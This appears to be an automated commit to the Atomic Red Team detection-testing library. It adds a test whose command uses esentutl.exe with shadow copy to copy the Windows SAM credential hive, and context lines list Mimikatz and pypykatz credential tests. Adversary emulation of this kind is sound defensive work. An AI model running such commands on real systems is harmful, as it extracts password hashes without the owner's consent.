Generate docs from job=validate_atomics_generate_docs branch=master

2020-07-17 15:13:28 +00:00
parent 6b04e9421e
commit 5d59fdbce1
8 changed files with 67 additions and 0 deletions
@@ -196,6 +196,7 @@ credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc
 credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
 credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
+credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
 defense-evasion,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
 defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
 defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
@@ -430,6 +430,7 @@ credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSp
 credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
 credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
+credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
 lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
 lateral-movement,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
 lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
@@ -419,6 +419,7 @@
 - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
  - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
  - Atomic Test #2: Registry parse with pypykatz [windows]
+  - Atomic Test #3: esentutl.exe SAM copy [windows]
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -875,6 +875,7 @@
 - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
  - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
  - Atomic Test #2: Registry parse with pypykatz [windows]
+  - Atomic Test #3: esentutl.exe SAM copy [windows]
 - T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -19346,6 +19346,33 @@ credential-access:
      executor:
        command: 'pypykatz live registry

+'
+        name: command_prompt
+        elevation_required: true
+    - name: esentutl.exe SAM copy
+      auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480
+      description: |
+        Copy the SAM hive using the esentutl.exe utility
+        This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_path:
+          description: Path to the file to copy
+          type: Path
+          default: "%SystemRoot%/system32/config/SAM"
+        file_name:
+          description: Name of the copied file
+          type: String
+          default: SAM
+        copy_dest:
+          description: Destination of the copied file
+          type: String
+          default: "%windir%"
+      executor:
+        command: 'del #{copy_dest}\#{file_name} & esentutl.exe /y /vss #{file_path}
+          /d #{copy_dest}/#{file_name}
+
 '
        name: command_prompt
        elevation_required: true
@@ -28,6 +28,8 @@ Notes:

 - [Atomic Test #2 - Registry parse with pypykatz](#atomic-test-2---registry-parse-with-pypykatz)

+- [Atomic Test #3 - esentutl.exe SAM copy](#atomic-test-3---esentutlexe-sam-copy)
+

 <br/>

@@ -117,4 +119,36 @@ pip3 install pypykatz



+<br/>
+<br/>
+
+## Atomic Test #3 - esentutl.exe SAM copy
+Copy the SAM hive using the esentutl.exe utility
+This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| file_path | Path to the file to copy | Path | %SystemRoot%/system32/config/SAM|
+| file_name | Name of the copied file | String | SAM|
+| copy_dest | Destination of the copied file | String | %windir%|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+del #{copy_dest}\#{file_name} & esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
+```
+
+
+
+
+
+
 <br/>
@@ -54,6 +54,7 @@ atomic_tests:
    name: command_prompt
    elevation_required: true
 - name: esentutl.exe SAM copy
+  auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480
  description: |
    Copy the SAM hive using the esentutl.exe utility
    This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
@@ -548,3 +548,4 @@ d9841bf8-f161-4c73-81e9-fd773a5ff8c1
 0b19f4ee-de90-4059-88cb-63c800c683ed
 315f4be6-2240-4552-b3e1-d1047f5eecea
 a123ce6a-3916-45d6-ba9c-7d4081315c27
+a90c2f4d-6726-444e-99d2-a00cd7c20480